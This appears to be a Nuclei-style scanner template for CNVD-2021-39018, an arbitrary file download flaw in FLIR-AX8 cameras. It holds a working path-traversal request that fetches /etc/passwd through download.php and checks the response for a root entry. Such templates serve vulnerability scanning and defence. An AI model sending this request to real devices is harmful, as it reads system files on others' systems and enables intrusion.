id: CNVD-2021-39018

info:
  name: FLIR-AX8 Arbitrary File Download
  author: daffainfo
  severity: high
  description: FLIR-AX8 has an arbitrary file download vulnerability. An attacker could exploit the vulnerability to download related system configuration files.
  reference: https://firetik.com/64229/flir-ax8-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD-cnvd-2021-39018
  tags: flir,cnvd,cnvd2021,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/download.php?file=/etc/passwd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
